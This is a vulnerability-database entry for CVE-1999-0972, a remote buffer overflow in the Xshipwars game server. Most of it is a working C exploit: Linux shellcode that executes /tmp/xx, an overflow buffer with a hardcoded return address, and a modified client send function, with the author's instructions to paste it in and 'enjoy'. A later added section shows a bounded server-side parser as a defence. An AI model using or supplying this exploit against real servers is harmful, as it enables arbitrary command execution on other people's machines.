Xshipwars Buffer Overflow Vulnerability
| Field | Value |
| --- | --- |
| Vulnerability ID | 1105640 |
| Vulnerability type | Buffer overflow |
| Published | 1999-12-09 |
| Updated | 2005-05-02 |
| CVE ID | CVE-1999-0972 |
| CNNVD ID | CNNVD-199912-041 |
| Platform | Multiple |
| CVSS score | 7.5 |
Source
Vulnerability details
The xsw program in Xshipwars contains a buffer overflow vulnerability.
Exploit (EXP)
/*
source: http://www.securityfocus.com/bid/863/info
Xshipwars is a graphical 'star battle' client/server based game which runs on a variety of platforms. Certain versions of the server which facilitates this game (versions before 1.25) had a remotely exploitable buffer overflow. The exploit would result in the execution of arbitrary commands as the UID of the server process.
*/
/* If the offset is off for your box, then the server will still crash,
and will begin an endless loop of sending itself log messages,
filling up whatever space it can on whatever partition it's installed
on. This is less than optimal behavior, so quickly find and kill the
server if your exploit fails.
Love,
A. Woodward, Dec 1999
<cut this and paste it into your client's source file, modify your
.h's to raise the limit on a few variables (grep for 256 and turn them
into 2560), recompile, and enjoy> */
#include <stdio.h>
#include <string.h>
/* CS_MESG_MAX, CS_DATA_MAX_LEN, CS_CODE_LITERALCMD and NetSendData()
 * come from the xsw client sources this function is pasted into. */

/*
 * Sends a literal command.
 */
/* hacked to send our attack buffer! */
int
NetSendExec(char *arg)
{
    char larg[CS_MESG_MAX];
    char sndbuf[CS_DATA_MAX_LEN];
    char exploitbuf[CS_DATA_MAX_LEN];
    int i;

    /* test shellcode. No whitespace, just exec's /tmp/xx. If it's not
       there, does random things. Replace this for slightly more
       fun. ;> */
    char code[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c"
                  "\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb"
                  "\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/tmp/xx";

#define SIZEOFBUF 229
    /* fill the whole attack buffer with 'A' (0x41) */
    memset(exploitbuf, 0x41, SIZEOFBUF);
#define SHELLSTART 50
    /* drop the shellcode into the filler at offset SHELLSTART */
    memcpy(exploitbuf + SHELLSTART, code, strlen(code));
    /* Return to: 0xbfffebe4  Your Kilometerage May Vary */
    exploitbuf[132] = 0xe4;
    exploitbuf[133] = 0xeb;
    exploitbuf[134] = 0xff;
    exploitbuf[135] = 0xbf;
    exploitbuf[SIZEOFBUF - 1] = 0;

    /*
    if(arg == NULL)
        return(-1);
    if(arg[0] == '\0')
        return(-2);
    */

    /* strncpy(larg, arg, CS_MESG_MAX); */
    strncpy(larg, exploitbuf, CS_MESG_MAX);
    larg[CS_MESG_MAX - 1] = '\0';

    /*
     * NET_CMD_EXEC format is as follows:
     *
     *  argument
     */
    sprintf(sndbuf, "%i %s\n",
        CS_CODE_LITERALCMD,
        larg
    );
    NetSendData(sndbuf);

    return(0);
}
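The server-side lesson from this bug is that the argument of a "<code> <argument>\n" line must be bounded by the receiver's own buffer, not by what the sender chose to put in CS_MESG_MAX. The following reader is an added example, not code from this page or from the Xshipwars project; CS_MESG_MAX, CS_CODE_LITERALCMD, parse_cmd_line and check_filler are assumed names and placeholder values, and the 229-byte filler it is tested against is constructed to match the exploit above.

```c
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define CS_MESG_MAX 256        /* assumed stand-in for the xsw header value */
#define CS_CODE_LITERALCMD 45  /* assumed placeholder, not the real code */

enum parse_result { PARSE_OK = 0, PARSE_BAD_FORMAT, PARSE_TOO_LONG, PARSE_NONPRINT };

/* Parse "<code> <argument>\n" from a client-supplied line into a caller-owned
 * buffer of argsz bytes. The limit is the receiver's buffer, never the sender's
 * claim, and an oversized argument is rejected rather than silently truncated. */
enum parse_result
parse_cmd_line(const char *msg, int *code, char *arg, size_t argsz)
{
    char *end;
    long c = strtol(msg, &end, 10);
    if (end == msg || *end != ' ')
        return PARSE_BAD_FORMAT;
    const char *p = end + 1;
    size_t n = strcspn(p, "\n");           /* argument ends at newline or NUL */
    if (n >= argsz)                        /* no room left for the terminator */
        return PARSE_TOO_LONG;
    for (size_t i = 0; i < n; i++)         /* a command is text; raw bytes are not */
        if (!isprint((unsigned char)p[i]))
            return PARSE_NONPRINT;
    memcpy(arg, p, n);
    arg[n] = '\0';
    *code = (int)c;
    return PARSE_OK;
}

/* Test helper: build a constructed "<code> AAAA...\n" line with n_fill filler
 * bytes (the exploit above sends 229) and parse it into an argsz-byte buffer. */
enum parse_result
check_filler(size_t n_fill, size_t argsz)
{
    char msg[600], arg[512];
    int code = 0;
    if (n_fill > 500 || argsz > sizeof arg)
        return PARSE_BAD_FORMAT;
    size_t off = (size_t)snprintf(msg, sizeof msg, "%i ", CS_CODE_LITERALCMD);
    memset(msg + off, 'A', n_fill);
    msg[off + n_fill] = '\n';
    msg[off + n_fill + 1] = '\0';
    return parse_cmd_line(msg, &code, arg, argsz);
}
```

Note that the same 229-byte filler passes when the receiving buffer is CS_MESG_MAX bytes and is rejected when it is 128 bytes: the check has to be written against the buffer that is actually being filled.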
References
Source: BID
Name: 863
Link: http://www.securityfocus.com/bid/863